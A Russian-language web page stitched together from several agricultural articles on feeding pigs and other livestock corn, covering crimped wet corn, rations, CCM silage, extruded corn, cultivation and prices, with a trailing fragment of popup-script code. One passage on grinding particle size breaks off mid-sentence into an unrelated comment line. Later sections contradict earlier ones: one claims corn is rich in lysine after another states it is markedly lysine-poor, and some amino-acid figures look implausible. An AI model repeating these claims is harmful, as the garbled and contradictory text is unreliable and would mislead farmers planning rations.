589 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Кукуруза как корм для свиней

Кукуруза для свиней

Главная цель свиноводства, как любой другой отрасли сельского хозяйства, – получение прибыли. Высокая доля кормов в себестоимости свинины заставляет искать пути снижения их стоимости. Одним из путей сокращения расходов на корма является производство и заготовка собственных кормов по эффективным технологиям.

Заготовка влажного плющеного зерна кукурузы в регионах её произрастания и скармливание плющёнки свиньям может улучшить экономику предприятия.

Эксперты говорят

Многие свиноводы всё ещё свято верят в то, что зерно для свиней надо дробить. Тест, проведённый в Дании, убедительно показал, что размеры частиц, которые получаются в результате плющения влажной кукурузы на дисковых и вальцовых мельницах, полностью соответствуют потребностям свиней.

Датскими экспертами во главе с Хельге Ларсеном были проведены два теста методом просеивания через сито. В первом случае исследовались фракции плющеной на вальцовой мельнице Murska 2000S2x2 кукурузы влажностью 37,9%, во втором – плющеной на дисковой мельнице Murska W-Max20C кукурузы влажностью 41,1%. Оба теста проводились после плющения на мельницах с производительностью 35-45 т/час.

Как видно из таблицы, результат качества плющения получен очень хороший, даже лучше, на что можно было рассчитывать. Доля частиц размером менее 1 мм в первом опыте составила 51,4%, а во втором – 72,4%. Таким образом, свинья может получить от половины до двух третей зерна кукурузы тонкого помола. С другой стороны, свиньям также нужна клетчатка, то есть более грубые частицы зерна. Когда в массе корма в достаточном количестве присутствуют грубые частицы, это способствует лучшей проходимости и переваримости пищи.

Для всех возрастов

Высокая урожайность влажной кукурузы в сочетании с высокой энергетической ценностью делают «царицу полей» незаменимым компонентом рациона свиней практически всех стадий выращивания. Традиционное же измельчение зерновых на дробилках, практически до мучной пыли, ведёт к проблемам со здоровьем животных, вплоть до их гибели. При скармливании плющенки процент падежа снижается. В крови свиней стабилизируется уровень сахара, что отражается на их общем самочувствии, а лекарств на лечение требуется всё меньше.

Если раньше плющеным консервированным зерном кукурузы кормили только свиней на откорме, то теперь дают даже свиноматкам, правда, в ограниченном количестве, особенно в период супоросности. Зато для подсосных свиноматок энергия кукурузы незаменима. При поедании плющеной консервированной кукурузы свиноматки больше производят молока для выпойки поросят. Как следствие – привесы поросят на подсосе растут, они становятся более спокойными. Опыт одного из крупнейших свиноводческих хозяйств Дании свидетельствует, что после введения в рацион свиноматки плющеного зерна кукурузы в размере 30% от массы корма, поросята ко времени отъема стали весить на 1 килограмм больше, чем при прежнем рационе кормления.

Кисленького поросятам

Поросята после отъёма испытывают трудности, связанные со сменой рациона, недостатком секреции ферментов и соляной кислоты. В то же время, снижается содержание молочной кислоты в желудке поросёнка-отъёмыша. Кислоты выполняют функции: бактерицидную и переваривания корма, особенно самой тяжёлой, но очень важной составляющей – протеина. Рацион растущего поросёнка отличается высокой концентрацией энергии и содержания протеина. В случае дефицита кислот и ферментов наблюдаются заболевания пищеварительной системы, отставание в росте и развитии, падеж молодняка.

Высокая переваримость плющёнки обусловлена воздействием кислот – муравьиной, пропионовой, молочной, уксусной – на протеин и другие питательные вещества корма.

Плющенка выступает в качестве подкислителя, кроме снижения иммунной нагрузки на организм поросёнка, она снижает буферную ёмкость кормосмеси, чем облегчает процесс пищеварения. В итоге: переваримость плющёнки – выше, конверсия корма – выше, потери от падежа – ниже. А главные «виновники» этих успехов – органические кислоты.

Лучше в рукава

При заготовке плющеного зерна важно соблюдать технологию консервирования. Плющеную консервированную кукурузу начинают заготавливать, когда она имеет наивысшую питательную ценность, то есть при влажности около 40%. Кукурузу плющат на вальцовых или дисковых мельницах (плющилках), одновременно добавляя консервант, затем закладывают на хранение или в траншеи, или в полиэтиленовые рукава. При закладке в траншею или на склад необходимо плющеную массу разравнивать, трамбовать, укрывать пленкой и класть сверху гнет. Одним из перспективных, или даже можно сказать, лучших способов является заготовка влажного плющеного зерна кукурузы в полимерные рукава. Этот способ уже широко применяется в сельскохозяйственных предприятиях по всей России.

Как раздашь, так и поешь

Плющеную кукурузу с успехом можно раздавать свиньям как при системе сухого, так и жидкого кормления. Производители оборудования для кормления свиней предлагают широкий ассортимент установок, в которых может использоваться влажная плющёнка. Например, в Дании используют два дешёвых и эффективных способа приготовления жидкого корма – в миксере и в чанах. В миксер подают плющеную кукурузу и другие компоненты, где они смешиваются, и к ним добавляется вода. Затем по трубе масса насосом с большой скоростью подаётся в свинарник. Длина трубы диаметром 65 мм (не больше!) может достигать двух километров. Второй способ – смешивание компонентов пропеллером в огромном чане.

Корма используемые в кормление свиней

Сбалансированное кормление свиней в домашних условиях , с применение качественных кормов является неотъемлемой частью в получение качественного и экологически чистого мяса.

Данная статья является дополнительным материалом к статье Основные корма, используемые при кормлении свиней

В данной статье ответим на вопрос – какие корма, доступные в домашних условиях.

Свинья, как любое животное, имеет период интенсивного роста. Этот период может длиться от 6,5 до 8 месяцев, до достижения веса животного 100-120 кг. Будет правильно это время использовать по максимуму. Однако эти цифры получены при идеальных условиях в специализированных хозяйствах.

На результат откорма влияет порода поросенка. Породистые свиньи отличаются большой скоростью роста и наиболее подходят для откорма.

Именно они могут иметь 100-120 кг живого веса к 6,5-8 месяцев. Свиньи, которых размножают в домашних условиях, такой массы достигнут ближе к 12 месяцам.

Условно весь корм можно поделить на несколько групп

1. Концентрированные корма

В данных типах кормов в большом количестве присутствуют углеводы (22,9-69,2%), жир (2,1-11%) и протеин (9,4-83,9%),и в малых объемах содержится вода (8-11%) и клетчатка (3-9%).

Зерновые корма следует перед скармливанием свиньям размолоть. Чем меньше фракция помола зерна, тем лучше переварится он животным.

Оптимально для кормления свиней подходит кукуруза, которая содержит много углеводов и жиров, что не скажешь о протеине. Она может присутствовать в 65 % кормового рациона. Ячмень и овес отлично влияют на качество мяса. Они хорошо перевариваются свиньей. Горох, вика и чечевица содержат много протеина и хорошо влияют на качество мяса.

Из отходов мельничного производства (которые так же относят к концентрированным кормам) широко применяю при кормлении свиней отруби и мельничную пыль.

Наиболее подходят для кормления пшеничные отруби, потому что они хорошо перевариваются, но злоупотреблять ими не стоит. Мельничная пыль состоит из муки, пыли с жерновов и отрубей.

Из отходов маслобойных предприятий широко применяю жмых и шрот. В этом корме присутствует до 35% протеина. При откорме свинье дают лишь до 300 г в день, а супоросной дают в два раза больше. Свиньям подходит лишь льняной или подсолнечниковый жмых. Его следует предварительно подробить.

2. Корма животного происхождения

К кормам животного происхождения относят мясокостная (МКМ) и рыбная кормовая мука, пахтанье, цельное коровье молоко, снятое коровье молоко (обрат), молочная сыворотка, ацидофилин (ацидофильная простокваша). Они содержат много полноценного белка.

Мясокостную муку рекомендуется использовать в рационе не более 100-200 г на голову в сутки. Она содержит до 65,0% протеина, 8,0-15,0% жира и 10,0-25,0% золы.

Рыбную кормовую муку дают до 150 г на голову в день. В ней насчитывается от 48% до 70% протеина и от 10% до 20% жира.

Коровье молоко, обрат, сыворотка, ацидофильная простокваша, пахтанье – хороший корм, который с удовольствием поедают поросята. Эти корма дают свиньям, добавляя к другим кормам.

3. Минеральные корма

Минеральные корма восполняют собой недостаток минералов в других кормах. К этим кормам относится: поваренная соль, мел, известь, костная мука и трикальцийфосфат.

4. Сочные корма

Сочными кормами считаются корнеклубнеплоды и зеленая трава. Они состоят на 65-90% из воды. К корнеклубнеплодам относят картофель, топинамбур, сахарную и кормовую свеклу, а также морковь.

Наибольшее значение, как корм, имеют картошка и сахарный бурак (свёкла). Перед скармливанием картофель моют и варят. К вареному картофелю нужно добавить мел и поваренную соль. После варки картофеля воду сливают, из-за содержания в ней ядов.

Свеклу и морковь дают в сыром виде, предварительно перед этим, измельчая. Клевер луговой, люцерна посевная, эспарцет посевной, люпин кормовой, кукуруза, суданская трава и озимая рожь – лучшие зеленые корма. Обычно их дают целыми или мелко измельчают.

Кроме этого нередко в кормление свиней используют ряску двух видов – трехдольную и маленькую. Ее немного пересыпают отрубями и мукой.

Все перечисленные корма, в большей или меньшей степени, являются доступными. Но каждому региону присущи свои особенности доступности кормов. Каждый хозяин, при составлении рациона кормления свиней, должен опираться на доступную ему кормовую базу. Также на рацион кормления влияет и возраст поросенка. Наличие некоторых кормов зависит от времени года. Это также нужно учитывать при планировании откорма.

Можно ли кормить свиней кукурузой?

Выращивание поросят – определенно прибыльный бизнес. За короткое время можно получить животное с хорошей массой, правильным количеством жира и мяса, однако для этого важно использовать только качественные корма.

Чаще всего фермеры содержат свиней на питании в виде объедков со стола, смешанных с фабричным кормом. Реже – разделяют эту пищу, используя либо один, либо второй вариант. Но в любом случае свиньям обязательно требуется разнообразие рациона, от которого как раз и зависит успешный набор массы. Известно, что хрюшки с удовольствием потребляют различные злаковые, в связи с чем возникает вопрос – можно давать свиньям кукурузу или нет?

Можно ли кормить свиней кукурузой

Кормление свиней кукурузой – основа успешного набора массы животными. Использовать ее можно как для свиноматок, так и для поросят или свиней на откорме. Именно в этом злаке содержится больше всего энергии и питательных веществ, потому кормить свиней кукурузой не только можно, но и нужно.

Рассмотрим пользу от разных видов этого продукта для животных:

Зерно кукурузы (г)

Корм из кукурузы, хоть и содержит мало белков, но зато снабжает организм энергией, а значит, и способствует набору массы.

Рацион и нормы кормления

В целом, кукуруза должна составлять половину от общей кормовой массы, поскольку в противном случае животному будет не хватать белка, что негативно скажется на его здоровье. Рассмотрим, как давать кукурузу как корм для свиней.

  1. Важно перед тем, как давать эти злаковые, провести помол. Размалывать лучше непосредственно перед кормлением, иначе жир, который есть в кукурузе, начнет окисляться и давать горечь, и животные не будут ее есть.
  2. Этот злак стоит силосовать в фазе молочно-восковой зрелости.
  3. Кукуруза для маленьких поросят полезна в период роста – тогда количество этого корма может достигать 50% от общего рациона. Если же поросята только родились, то количество кукурузы в меню не должно превышать 5%.
  4. За пару месяцев до убоя злаковые сокращают в рационе, иначе сало получится мягким и мажущимся.

В целом, корм для пятачков может собираться из ячменя (40%), пшеницы (30%), гороха (10%), кукурузы (10%) и овса (10%).

Можно ли свиньям кукурузу в початках? Некоторые фермеры, зная о том, что свиньи жиреют от обилия кукурузы в рационе, все же продолжают давать животным этот корм, поскольку и на такое мясо и сало есть определенный спрос. Как правило, рацион состоит не только из кукурузы, но и пшеницы, кабака и воды. А вот злакового корма можно давать и в початках, главное – не более ведра в день. Не менее важный вопрос – качество кукурузы, ведь хрюшкам стоит давать только злаковые определенного вида.

Как отличить кормовую кукурузу от пищевой?

Выбирая, чем лучше кормить свиней для быстрого роста, многие фермеры останавливаются на кукурузе. Вот только этого злака существует несколько видов, и для пятачков лучше использовать как раз кормовую кукурузу. Как же ее отличить от пищевой, которую ест человек?

  1. По виду. Пищевая имеет короткие толстые початки светло-бежевого цвета, а кормовая – более яркая и длинная.
  2. Зерна – у кормовой тверже, нежели у пищевой.
  3. Вкус – пищевая слаще. По большому счету, попробовать такой злак можно прямо во время покупки – вреда здоровью это не нанесет.
Как кормить поросят в домашних условиях видео

Смотрите, как правильно составить смеси для кормления хрюшек дома

Оптимальное кормление свиней на кукурузе

Кормовые рационы с зерном кукурузы, консервированной смесью зерна и стержней початков (CCM) и/или экструдированным зерном кукурузы позволяют достигать наивысших биологических показателей продуктивности на выращивании свиноматок, поросят и свиней на откорме. Решающая предпосылка для этого – высокая концентрация энергии в кукурузе и факт, что содержание антипитательных веществ в ней очень низкое. Эти вещества могли бы вести из-за ухудшения вкуса и переваримости к низкому потреблению корма и к ухудшению усвоения отдельных питательных веществ. Но наипервейшим условием к безвредному применению в кормлении является высокий статус гигиены во всех продуктах из кукурузы.

Для целевого, ориентированного на продуктивность и защиту окружающей среды, использования кукурузы необходимы точные знания о кормовой ценности касательно содержания питательных, минеральных и других активных веществ, а также, еще важнее, имеющегося гигиенического статуса.

Успешные кормовые стратегии всегда разрабатываются с учетом заранее определенных показателей продуктивности. Целевые показатели продуктивности для выращивания поросят и откорма свиней представлены в таблицах 1 и 2.

Таблица 1. Цели на выращивании поросят

>24 поросенка (1,5 кг ЖМ) на свиноматку в год
> 450 г среднесуточные привесы: 8-28 кг ЖМ
800 г (850 г) среднесуточные привесы: 28-118 кг ЖМ
0,98 баллов/кг забойного веса

Кормовая ценность зерна кукурузы, консервированной смеси зерна и стержней початков кукурузы и экструдированного зерна кукурузы

В таблицах 3а и 3б представлено содержание питательных веществ для зерна кукурузы, консервированной смеси зерна и стержней початков кукурузы — CCM (60% сухого вещества) и экструдированного зерна кукурузы в сравнении с ячменем и пшеницей, а также рекомендации по проценту ввода данных продуктов в комбикорма для поросят и откорма свиней. Все показатели представлены на 88% сухого вещества.

Таблица 3а. Содержание питательных веществ, энергии и минеральных веществ в продуктах из кукурузы по сравнению с зерновыми, а также рекомендованный % введения в комбикорм для поросят, г/кг на 88% сухого вещества

Таблица 3б. Содержание питательных веществ, энергии и минеральных веществ в продуктах из кукурузы по сравнению с зерновыми, а также рекомендованный % введения в комбикорм для откорма свиней, г/кг на 88% сухого вещества

Очевидно, что как три вышеназванных продукта из зерна кукурузы, так и ячмень, и пшеница в кормлении свиней используются как чистые поставщики энергии.

Содержание сырого протеина в кукурузе на уровне 9% находится значительно ниже целевых норм: 17-18,5% сырого протеина для откорма с 35 кг или 15,5-16,5% сырого протеина для откорма с 70 кг живого веса. Тоже самое действительно и при сравнении требований по содержанию сырого протеина в кормах для поросят с 9, 12 и 20 кг живого веса.

В сравнении с зерновыми, для кукурузных продуктов нужно планировать добавление большего количества белкового корма. При этом решающим будет не только низкое содержание сырого протеина в зерне кукурузы или ССМ. Гораздо важнее является значительно более низкое содержание главной лимитирующей аминокислоты лизина. По сравнению с ячменем содержание лизина в зерне кукурузы и в ССМ на 35% ниже. Очень низкое соотношение лизина к энергии в 0,19 г лизина на 1 МДж обменной энергии подтверждает это утверждение.

Кроме того, все продукты из кукурузы очень бедны аминокислотой триптофаном. Её содержание на почти 60% ниже по сравнению с зерновыми культурами. Если же содержание триптофана в кормосмесях будет значительно занижено, это может, прежде всего, привести к снижению потребления корма животными. Но как-раз триптофан на практике реже всего добавляют в рецептуры комбикормов для свиней.

Содержание серосодержащих аминокислот метионина и цистина, также, как и треонина, в кукурузном сырье ниже, чем в зерновых, но не настолько, как лизина и триптофана.

Содержание сырого жира в зерне кукурузы и ССМ, напротив, почти в два раза выше, чем в зерновых. Жир в кукурузе состоит в среднем на 58% из полиненасыщенных жирных кислот, особенно линолевой и линоленовой (= полиеновые кислоты). Из-за своей структуры они способствуют образованию у животных мягкой консистенции шпика и делают его сравнительно скоропортящимся (=прогоркание). Из опытов известно, что наличие в корме большого количества полиеновых кислот ведет к немедленному и значительному влиянию на состав жира организма. Максимальное содержание полиеновых кислот в шпике, необходимое мясокомбинатам для производства продуктов длительного хранения (сырокопчёная колбаса, ветчина) составляет 15 процентов. Для того, чтобы остаться в этих рамках, в комбикорме должно содержаться не более 20 г полиеновых кислот/кг (на 88% сухого вещества). И чтобы не превысить этот показатель в кормосмесях для откорма на базисе соевого шрота и ССМ, доля жиросодержащих компонентов должна быть ограничена. Данные в таблице 4 содержат ориентировочные показатели по этому вопросу.

Таблица 4. Максимальное введение (%) кормового сырья для поддержания верхней границы полиеновых кислот на уровне 20 г на кг комбикорма (88% сухого вещества)

Базовая смесь на основе
Зерновые / соевый шрот ССМ / соевый шрот
ССМ-% (свежий) 45 70
Составляющие:
ССМ (60% СВ) при 88% СВ) 70
Соевое масло 1,5 0,7
Рапсовое масло 3,0 1,4

Содержание сырой клетчатки на уровне 23 г/кг самое низкое у зерна кукурузы. Из-за содержания частей початков этот показатель увеличивается в ССМ. В зависимости от доли початков содержание сырой клетчатки в ССМ может колебаться от 2,5 до 6,5%.

В непосредственной зависимости к содержанию сырой клетчатки находится определяемый расчетным путём показатель содержания энергии. В зерне кукурузы он очень высокий и составляет в среднем 14,5 МДж обменной энергии. Содержание энергии в пшенице ниже на 0,4 МДж. ССМ с 60% сухого вещества и около 3% сырой клетчатки содержит 13,9 МДж ОЭ на 88% сухого вещества и немного не достигает уровня энергии пшеницы. Но значительно превышает содержание энергии в ячмене (12,9 МДж ОЭ). Решающий предпосылкой высокой концентрации энергии в кукурузном сырье является, конечно, в первую очередь, высокое содержание крахмала.

По сравнению с зерновыми кукурузное кормовое сырье также содержит в целом меньше минеральных веществ. Помимо фосфора, в рационы на основе ССМ нужно и добавление кальция. Обеспечение фосфора должно основываться на показателе «переваримый фосфор», потому что именно по этому показателю даются нормы обеспечения фосфором животных. По сравнению с зерном кукурузы ССМ содержит значительно больше переваримого фосфора, потому что в процессе консервации переваримость фосфора улучшается. Если в зерне кукурузы природная переваримость фосфора составляет 15%, то в ССМ она достигает 50%.

В целом можно утверждать, что за счет целевого введения зерна кукурузы и ССМ можно составлять высокоценные кормосмеси для свиноматок, поросят и свиней на откорме. При этом решающим фактором для высокой продуктивности является уровень обеспечения энергией. В раннем выращивании поросят всё чаще применяют экструдированную кукурузу в размере около 30% в смеси, чтобы облегчить переход животных с питания преимущественно молоком на твёрдые корма. За счет улучшенного процесса обработки зерна, как правило, удается достичь степень раскрытия крахмала свыше 80%. Почти что полностью разложенный на простые сахара крахмал может усваиваться слаборазвитым пищеварительным трактом маленьких отлученных поросят гораздо лучше, чем сырой крахмал. Нарушения процессов пищеварения наблюдаются здесь намного реже, и животные гораздо охотнее потребляют корм. Это доказывают результаты исследования, которые были проведены в сельскохозяйственном центре Дюссе (таблица 5).

Таблица 5. Результаты кормового опыта с экструдированным зерном кукурузы в сельскохозяйственном центре Дюссе

Опытные группы 30% овсяных хлопьев, отходы выпечки 30% экструди-рованного зерна Всего
Животные 191 197 388
Длительность опыта, дней 45 45 45
Вес при рождении, кг 1,67 1,64 1,65
Вес в начале опыта, кг 8,4 8,3 8,4
Вес в конце опыта, кг 27,6 28,1 27,8
Общий среднесуточный привес, г 427 435 431
Общее потребление корма на голову в день, г 719 724 722
Конверсия корма, кг корма/ кг привеса 1,68 1,61 1,64

Повысить степень усвоения крахмала для поросят-отъемышей также можно за счет изготовления ферментируемой смеси из зерна кукурузы, ССМ и/или зерновых. При высоком уровне гигиены кормовой кухни и трубопроводов можно осуществлять ферментацию всего корма полностью, вместе с белковым сырьём. В процессе ферментации важно, чтобы были созданы оптимальные условия для быстрого роста молочнокислых бактерий, а вредные микроорганизмы, такие как газообразующие дрожжи и образующие уксусную кислоту микробы не развивались. Это можно осуществить в ёмкостях для ферментации без доступа кислорода, для того, чтобы так можно быстрее создать анаэробные условия. Новейшее оборудование позволяет это, поскольку в нем предусмотрены различные варианты герметических соединений и одновременный привод нового корма в ферментер. Такой способ монтажа позволяет также легче поддерживать в ферментере постоянную температуру от 23° до 27°С.

Цель успешной ферментации — как можно более быстрое достижение концентрации молочнокислых бактерий в кормовой каше свыше 3%. Это повышает вкусовые качества корма, происходит предварительное переваривание питательных веществ. Также ферментация в целом способствует лучшему здоровью кишечного тракта. Но наиважнейшей предпосылкой для ферментации является наивысший уровень кормовой гигиены.

Стремиться к высокому гигиеническому статусу

Все территории, на которых производится закладка силосованного зерна кукурузы должны быть предварительно тщательно очищены

Чтобы получить высокую кормовую ценность продуктов из кукурузы, все процессы с момента уборки урожая до скармливания кукурузы должны протекать с соблюдением высокого гигиенического статуса. Для зерна кукурузы это своевременная и достаточная сушка собранного с поля зерна и последующее хранение в сухом помещение с возможностью вентилирования.

При силосовании и скармливании ССМ для обеспечения высокого гигиенического статуса рекомендуем придерживаться контрольного списка (чек-листа), приведенного в таблице 6.

Таблица 6. Мероприятия по улучшению гигиенического статуса ССМ

Предотвращать чрезмерные бактериальные нагрузки в кормлении
Очистка складских помещений перед заполнением
Долю початков по возможности уменьшать, цель – сухое вещество около 60%
Размол >80% частиц 2-4/6 недель)
достаточная скорость выемки (>10-15 см/день)
ровная площадь среза
целенаправленное консервирование, точная дозировка
не скармливать зараженный ССМ (свиноматкам и поросятам)
Откорм: зараженные партии распределять порционно и равномерно

Так, все площади, на которых заготавливается ССМ, должны тщательно очищаться перед повторным наполнением. При хранении ССМ в силосных башнях нужно обращаться к специализированным фирмам, проводящим очистку. Для получения стабильного хранения возможно нужно досушивание силосуемой массы до 60% (±2%) сухого вещества. При таком содержании сухого вещества размолотая масса из зерна и стержней початков кукурузы хорошо уплотняется, а значит повторное нагревание возникает гораздо реже. При очень влажном ССМ возникает опасность растрескивания и глубокого проникновения воздуха с последующим размножением дрожжей после открытия ёмкости. Оптимальным является размол, при котором 80% частиц имеют размер С нетерпением жду отзывы и комментарии. Большое Вам спасибо!

Что такое фуражная кукуруза, как её выращивают и куда применяют

Мировое производство кукурузы на зерно в 2018 году составило около 960 миллионов тонн, и объемы продолжают возрастать. Две трети валового сбора культуры расходуется на корм сельскохозяйственных животных и птицы.

Чем отличается кормовая (фуражная) кукуруза от пищевой, о достоинствах и недостатках откорма скота кукурузой расскажем в статье.

Что такое фуражная кукуруза

Фуражная кукуруза — группа сортов, неприхотливых к условиям выращивания, но обладающих пониженными вкусовыми качествами. Зерно таких растений используется в качестве питательного и недорогого корма сельскохозяйственных животных: крупного рогатого скота, свиней, птицы.

Ценность кукурузы как фуража

Корм на основе кукурузного зерна отличает:

  • повышенное содержание углеводов (не менее 70%);
  • большое количество жира (около 8%);
  • низкое содержание белка (до 10%).

В 1 кг сухого вещества содержится не менее 15 МДж обменной энергии (ОЭ). Для сравнения энергетическая ценность фуражной пшеницы — не более 12 МДж/кг ОЭ.

Справка. Обменная энергия — количество энергии в усвоенных после переваривания веществах корма. Вычисляется как разность энергетической ценности рациона и потерь энергии с калом, мочой и кишечными газами (метаном).

Зерно злака богато витаминами (в особенности группы В) и минеральными веществами (магнием, натрием, железом).

Этот корм содержит незаменимые аминокислоты. В 1 кг находится 1,01 мг лизина, 2,05 мг триптофана, 4,99 мг тирозина, 4,6 мг аргинина.

Животные охотно поедают рационы на основе кукурузного зерна .

Как отличить от пищевой

Иногда недобросовестные производители выдают дешевую кормовую кукурузу за более дорогие пищевые сорта. Отличить разновидности злака поможет таблица.

Признак Кормовая Пищевая
Форма початка Тонкая, вытянутая Толстая, короткая
Цвет зерен технической спелости Ярко-желтый или оранжевый Бледно-желтый, кремовый
Вкусовые качества Несладкая, жесткая текстура даже после длительной варки Нежная, сочная, сладкая. Зерна мягкие, не требуют длительной термической обработки

Фото поможет лучше разобраться в отличиях кормового и пищевого растения.

Особенности выращивания и хранения

Технология возделывания, послеуборочной обработки и хранения фуражной и пищевой кукурузы схожи.

Особенность кормовой разновидности — меньшая требовательность к теплу и солнцу. Поэтому сорта фуражного направления с успехом культивируются даже в северных земледельческих районах.

Обработка почвы

Кукуруза нетребовательна к предшественникам и дает хорошие урожаи при правильной агротехнике даже в монокультуре.

Растение предпочитает рыхлые почвы, поэтому осеннюю вспашку проводят на глубину 20—25 см. Весной боронуют зябь и по мере отрастания сорняков культивируют 1-2 раза. Последнюю предпосевную культивацию на глубину заделки семян делают одновременно с внесением гербицидов.

Удобрение

Перед вспашкой вносят калийно-фосфорные удобрения из расчета 60—90 кг фосфора и 40—60 кг калия на гектар и перепревший навоз в количестве 30—40 т/га, а также 30 кг/га азотных удобрений в аммиачной форме.

Перед первой культивацией подкармливают почву аммиачной селитрой из расчета 20—30 кг/га.

Посев

Используют отсортированные и протравленные семена. Посев злака начинают при прогревании посевного слоя почвы до +10—12 ºС. Оптимальная глубина заделки семян 6—8 см, при посадке в тяжелые глинистые почвы ее сокращают до 4-5 см. Засушливая погода требует увеличения глубины сева до 10—12 см.

Ширина междурядий должна быть 60—70 см. Расход семян колеблется в зависимости от сорта, региона и назначения и составляет от 10 до 25 кг на гектар.

Уход за посевами заключается в рыхлении, прополке, борьбе с болезнями и вредителями.

За сезон проводят 2-3 междурядные культивации:

  • первую — в фазе 3—5 листьев;
  • вторую — через две недели при появлении сорняков и почвенной корки;
  • последнюю при высоте растений 60—70 см.

С заболеваниями и вредителями ведут борьбу защитными препаратами в зависимости от вида.

Уборка

Уборку начинают в фазе биологической зрелости зерна. Содержание сухого вещества достигает 60%, зерна приобретают яркую окраску, листья и стебли желтеют. В этот период вес початка максимален.

На заметку! Ориентир для начала уборочных работ — появление «черной точки» у основания зернышка кукурузы.

Для сбора зерна фуражного назначения применяют комбайновую уборку с обмолотом початков самоходными агрегатами КСКУ-6.

Послеуборочная обработка зерна

После сбора кукурузу очищают и сортируют на воздушно-ситовых сепараторах. Зерно с влажностью менее 16% отправляют на хранение, с более высоким содержанием влаги — на сушку в шахтные, колонные или бункерные сушилки. Для кормовых целей высушивание проводят при температуре не выше 50 °C.

После сушки зерно обязательно охлаждают. Перед засыпкой в хранилище температура кукурузы не должна превышать температуру окружающего воздуха более, чем на 10 °C.

Дальнейшее хранение

Кукурузное зерно хранят насыпью на складах, в силосных башнях элеваторов, в бункерных хранилищах при влажности 15-16%.

При хранении контролируют температуру, влажность, цвет, запах, чистоту продукта. Особое внимание уделяют степени зараженности вредителями и болезнями. Все перечисленные показатели должны соответствовать нормам ГОСТ Р 53903-2010 «Кукуруза кормовая. Технические условия».

Как использовать

Использование кукурузы в качестве корма имеет свои нюансы. Так как злак беден белками, к нему необходимо подмешивать фураж пшеницы или бобовых: сои, гороха, люпина.

Такие смеси используют для откорма свиней, птицы, крупного рогатого скота.

Корма, содержащие кукурузу, идеальны для молодняка. За счет малого количества клетчатки они полностью усваиваются организмом молодых животных.

Существуют различные виды кормов из кукурузы:

  • законсервированное или высушенное зерно;
  • кукурузные хлопья;
  • початковая мука;
  • дробленое зерно.

Корма из кукурузы нравятся животным и вводить их в рацион опытные фермеры советуют осторожно, чтобы избежать нарушений пищеварения, связанных с перееданием.

Включение фуража в состав кормов

Использование фуража кукурузы для кормления крупного рогатого скота, свиней и птицы имеет отличия, так как у разных видов животных различные потребности.

Корма для птицы

Для кур-несушек рекомендуется добавлять кукурузное зерно в количестве не более 20%. Иначе возникает риск ожирения и снижения продуктивности.

На заметку! В зимний период долю кукурузы в рационе птицы увеличивают для восполнения затрат энергии на поддержание температуры тела.

Особи на откорме допускается кормить смесями, в состав которых входит до 40% кукурузного фуража. Набор живого веса происходит быстро и при этом не страдает качество мяса.

Можно ли кормить свиней кукурузой

В свиноводческих хозяйствах используют до 40% этого вида фуража для ускорения откорма. Обязательно сочетают его с высокобелковыми кормами: горохом, жмыхом, сеном из бобовых трав.

Справка. Лизин, содержащийся в большом количестве в кукурузном зерне, необходим для синтеза мышечного белка и способствует быстрому набору веса.

Кормят свиней только дробленым зерном, так как их пищеварительные соки не переваривают твердую оболочку.

Откорм крупного рогатого скота (КРС)

Для откорма КРС используют фуражную кукурузу в различных видах:

  1. Початковая мука — это размолотые кукурузные початки. Стержни составляют около 20% массы початка, поэтому питательная ценность этого корма ниже, чем у зерен. Муку используют на ранних этапах откорма в количестве, не превышающем 50% от общей массы рациона.
  2. До 40% целого или дробленого зерна включают в состав высококонцентрированных кормов. Использование этого вида фуража минимизирует ручной труд при приготовлении и раздаче кормов.
  3. Кукурузные хлопья получают обработкой зерна паром в течение 10—15 минут. При этом желатинизируется около 50% крахмала, это способствует лучшей усвояемости. Хлопья используют как добавку к концентратам и объемистым кормам (сено, сенаж, силос, барда, плодовые выжимки).

Стоимость

Средняя стоимость кормовой кукурузы и фуражной пшеницы зависит от класса продукта, региона, объема поставки.

Так в Краснодарском крае можно найти кукурузное фуражное зерно 1 класса по цене 9 000 рублей за тонну.

А вот на Урале, например, в Свердловской области, на кукурузу того же качества будет действовать цена от 17 000 руб./т. При объеме закупки от 20 тонн поставщики снизят цену до 11 500—12 000 руб.

Заключение

Фуражная кукуруза используется на корм сельскохозяйственных животных. Ее применяют при откорме скота в виде цельного или дробленого зерна, початковой муки или хлопьев для ускорения набора массы. Отличается от пищевой более яркими и длинными початками, жесткой текстурой зерен и худшими вкусовыми качествами.

Это одна из наиболее питательных культур, но применяют ее преимущественно в смесях с другими кормами: фуражной пшеницей, горохом. Использование в рационе только кукурузы приводит к дисбалансу питательных веществ, расстройствам пищеварения животных, ожирению и снижению продуктивности. Средняя цена на фуражную кукурузу в целом сопоставима с ценами на фуражную пшеницу.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
